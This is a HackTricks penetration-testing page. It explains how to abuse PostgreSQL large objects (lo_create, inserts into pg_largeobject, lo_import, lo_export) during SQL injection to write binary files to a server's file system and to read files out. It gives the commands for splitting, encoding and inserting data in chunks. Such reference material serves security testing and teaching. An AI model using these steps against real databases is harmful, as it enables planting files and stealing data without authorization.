hacktricks/pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md
Carlos Polop cfff5cc9a8 re
2024-12-14 12:46:15 +01:00

114 lines
5.4 KiB
Markdown

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
### PostgreSQL Large Objects
PostgreSQL offers a structure known as **large objects**, accessible via the `pg_largeobject` table, designed for storing large data types, such as images or PDF documents. This approach is advantageous over the `COPY TO` function as it enables the **exportation of data back to the file system**, ensuring an exact replica of the original file is maintained.
For **storing a complete file** within this table, an object must be created in the `pg_largeobject` table (identified by a LOID), followed by the insertion of data chunks, each 2KB in size, into this object. It is crucial that these chunks are exactly 2KB in size (with the possible exception of the last chunk) to ensure the exporting function performs correctly.
To **divide your binary data** into 2KB chunks, the following commands can be executed:
```bash
split -b 2048 your_file # Creates 2KB sized files
```
For encoding each file into Base64 or Hex, the commands below can be used:
```bash
base64 -w 0 <Chunk_file> # Encodes in Base64 in one line
xxd -ps -c 99999999999 <Chunk_file> # Encodes in Hex in one line
```
**Important**: When automating this process, ensure to send chunks of 2KB of clear-text bytes. Hex encoded files will require 4KB of data per chunk due to doubling in size, while Base64 encoded files follow the formula `ceil(n / 3) * 4`.
The contents of the large objects can be viewed for debugging purposes using:
```sql
select loid, pageno, encode(data, 'escape') from pg_largeobject;
```
#### Using `lo_creat` & Base64
To store binary data, a LOID is first created:
```sql
SELECT lo_creat(-1); -- Creates a new, empty large object
SELECT lo_create(173454); -- Attempts to create a large object with a specific OID
```
In situations requiring precise control, such as exploiting a Blind SQL Injection, `lo_create` is preferred for specifying a fixed LOID.
Data chunks can then be inserted as follows:
```sql
INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 0, decode('<B64 chunk1>', 'base64'));
INSERT INTO pg_largeobject (loid, pageno, data) VALUES (173454, 1, decode('<B64 chunk2>', 'base64'));
```
To export and potentially delete the large object after use:
```sql
SELECT lo_export(173454, '/tmp/your_file');
SELECT lo_unlink(173454); -- Deletes the specified large object
```
#### Using `lo_import` & Hex
The `lo_import` function can be utilized to create and specify a LOID for a large object:
```sql
select lo_import('/path/to/file');
select lo_import('/path/to/file', 173454);
```
Following object creation, data is inserted per page, ensuring each chunk does not exceed 2KB:
```sql
update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=0;
update pg_largeobject set data=decode('<HEX>', 'hex') where loid=173454 and pageno=1;
```
To complete the process, the data is exported and the large object is deleted:
```sql
select lo_export(173454, '/path/to/your_file');
select lo_unlink(173454); -- Deletes the specified large object
```
### Limitations
It's noted that **large objects may have ACLs** (Access Control Lists), potentially restricting access even to objects created by your user. However, older objects with permissive ACLs may still be accessible for content exfiltration.
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>Support HackTricks</summary>
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}